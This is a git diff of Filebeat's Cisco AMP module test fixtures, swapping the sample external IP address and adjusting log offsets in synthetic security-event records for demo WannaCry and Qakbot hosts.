             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2283,7 +2283,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2321,7 +2321,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 75732,
+        "log.offset": 75917,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2330,7 +2330,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2342,7 +2342,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2380,7 +2380,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 76965,
+        "log.offset": 77155,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2389,7 +2389,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2401,7 +2401,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2439,7 +2439,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 78202,
+        "log.offset": 78397,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2448,7 +2448,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2460,7 +2460,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2498,7 +2498,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 79439,
+        "log.offset": 79639,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2507,7 +2507,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2519,7 +2519,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2557,7 +2557,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 80676,
+        "log.offset": 80881,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2566,7 +2566,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2578,7 +2578,7 @@
         "@timestamp": "2021-01-14T15:24:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2612,7 +2612,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 81932,
+        "log.offset": 82142,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -2621,7 +2621,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2633,7 +2633,7 @@
         "@timestamp": "2021-01-14T15:24:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2673,7 +2673,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 83114,
+        "log.offset": 83329,
         "related.hash": [
             "32c9e6737dbdcbfb7563a3f27e2b1571",
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
@@ -2684,7 +2684,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2700,7 +2700,7 @@
         "@timestamp": "2021-01-14T15:24:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2736,7 +2736,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 84487,
+        "log.offset": 84707,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -2745,7 +2745,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2761,7 +2761,7 @@
         "@timestamp": "2021-01-14T15:24:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2801,7 +2801,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 85686,
+        "log.offset": 85911,
         "related.hash": [
             "32c9e6737dbdcbfb7563a3f27e2b1571",
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
@@ -2812,7 +2812,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2828,7 +2828,7 @@
         "@timestamp": "2021-01-14T15:24:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2860,7 +2860,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 87059,
+        "log.offset": 87289,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -2869,7 +2869,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2881,7 +2881,7 @@
         "@timestamp": "2021-01-14T15:18:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2915,7 +2915,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 88168,
+        "log.offset": 88403,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2924,7 +2924,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2936,7 +2936,7 @@
         "@timestamp": "2021-01-14T15:18:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2975,7 +2975,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 89361,
+        "log.offset": 89601,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -2989,7 +2989,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3005,7 +3005,7 @@
         "@timestamp": "2021-01-14T15:18:48.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3037,7 +3037,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 90868,
+        "log.offset": 91113,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -3046,7 +3046,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3058,7 +3058,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3092,7 +3092,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 91988,
+        "log.offset": 92238,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3101,7 +3101,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3113,7 +3113,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3147,7 +3147,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 93180,
+        "log.offset": 93435,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3156,7 +3156,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3168,7 +3168,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3206,7 +3206,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 94365,
+        "log.offset": 94625,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3215,7 +3215,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3231,7 +3231,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3269,7 +3269,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 95638,
+        "log.offset": 95903,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3278,7 +3278,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3294,7 +3294,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3332,7 +3332,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 96911,
+        "log.offset": 97181,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3341,7 +3341,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3357,7 +3357,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3395,7 +3395,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 98184,
+        "log.offset": 98459,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3404,7 +3404,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3420,7 +3420,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3458,7 +3458,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 99457,
+        "log.offset": 99737,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3467,7 +3467,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3483,7 +3483,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3521,7 +3521,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 100730,
+        "log.offset": 101015,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3530,7 +3530,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3546,7 +3546,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3584,7 +3584,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 102003,
+        "log.offset": 102293,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3593,7 +3593,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3609,7 +3609,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3647,7 +3647,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 103275,
+        "log.offset": 103570,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3656,7 +3656,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3672,7 +3672,7 @@
         "@timestamp": "2021-01-14T14:41:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3710,7 +3710,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 104547,
+        "log.offset": 104847,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3719,7 +3719,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log
index 6ccff00d38b1..c3b68a16f627 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log
@@ -1,53 +1,53 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
